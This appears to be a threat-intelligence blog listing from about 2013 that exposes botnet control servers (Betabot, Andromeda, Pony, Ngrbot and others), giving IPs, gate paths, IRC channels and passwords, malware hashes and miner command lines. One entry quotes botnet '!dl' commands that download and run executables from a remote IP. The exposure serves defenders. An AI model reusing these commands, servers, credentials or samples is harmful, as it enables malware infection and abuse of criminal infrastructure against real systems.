Author: I_Post_Ur_Info

178.79.183.247 (Lightaidra router botnet hosted by linode.com)

Uncategorized

Server:  178.79.183.247, 50.2.193.199, 94.229.66.97 Port:  65112 Current global users: 2898, Max: 2988 Channel:  ##hug## Topic for ##hug## is: .advscan->random->b root dreamboxTopic for ##hug## set by gaspolo at Fri May 31 13:36:47 2013 Oper: [GaSp`ZzzZ] (~g45p0@5.144.173.5): g45p0[GaSp`ZzzZ] irc.primo.org :Yet another IRC Server running on Debian GNU/Linux[GaSp`ZzzZ] idle 181:02:12, signon: Thu May 30 22:19:39[GaSp`ZzzZ] End of WHOISRead more...

cthulhuhf.net (Betabot http botnet hosted by warez-host.com)

Uncategorized

Resolved cthulhuhf.net to 91.223.82.43 Server:  cthulhuhf.net Gate file:  /misc/order.php Alternate domains: cthulhuhf.eu cthulhuhf.org.uk cthulhuhf.co.uk cthulhuhf.xxx Hosting infos: http://whois.domaintools.com/91.223.82.43 Related md5s (search on malwr.com to download the samples):  Beta bot: aa07b845981ba53b6100dba745ba5c1a

www.mydowncenter.me (Andromeda http botnet hosted by pw-service.com)

Uncategorized

Resolved www.mydowncenter.me to 37.0.122.132 Server:  www.mydowncenter.me Gate file:  /andro/image.php  Plugins  Rootkit:  hxxp://www.mydowncenter.me/andro/r.pack Socks:  hxxp://www.mydowncenter.me/andro/s.pack Formgrabber:  hxxp://www.mydowncenter.me/andro/f.pack   Gate file:  /andro/fg.php Hosting infos: http://whois.domaintools.com/37.0.122.132 Related md5s (search on malwr.com to download the samples): Andromeda: a26ffa2c7bd0e7899b04768f9e76a938

s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)

Uncategorized

Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160 Server:  s5.6d6f6e65797072696e746572.com Gate file:  /wp-admin/order.php Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com Mining info: svchost.exe’ -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex Hosting infos: http://whois.domaintools.com/188.190.127.160 Related md5s (search on malwr.com to download the samples): Betabot: db9a816d58899f1ba92bc338e89f856a

breathespacesfacebook.org (Socks5Masterz botnet hosted by burst.net)

Uncategorized

Resolved breathespacesfacebook.org to 46.37.162.26 Server:  breathespacesfacebook.org Gate file:  /gate.php Altnerate domains: tweaksights.org gotoguydreamed.org percussiontasked.org tenmileage.org Hosting infos: http://whois.domaintools.com/46.37.162.26 Related md5s (search on malwr.com to download the samples): Proxy bot: 7dc68e49d035107d132e19adf9f23d3b

t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)

Uncategorized

Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187 Server:  t.baerr01.com Port:  6512 Server password:  smart Channel:  #dpi :hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe Channel:  #tar Channel password:  smart A modified ircd is used, making it difficult to connect using a regular irc client. Related md5s (search onRead more...

www.welovegiveaways.net (Andromeda http botnet hosted by enzu.com)

Uncategorized

Resolved www.welovegiveaways.net to 199.229.235.250 Server:  www.welovegiveaways.net Gate file:  /justricewithwater/image.php Plugins: Rootkit:  hxxp://www.welovegiveaways.net/justricewithwater/r.pack Bitcoin mining info: Shell.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1  -p none -t 0 -I 10macromedia.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1  -p none -g no Hosting infos: http://whois.domaintools.com/199.229.235.250

toxhoster.net (Pony loader hosted by ecatel.net)

Uncategorized

Resolved toxhoster.net to 80.82.79.35 Server:  toxhoster.net Gate file:  /forum/gate.php Some idiot set it to download itself from the server, so it will run in an endless loop of stealing passwords, sending logs, and then downloading and running itself. Hosting infos: http://whois.domaintools.com/80.82.79.35 Related md5s (search on malwr.com to download the samples): b22258989a5e93d4cb1c3960441c1c06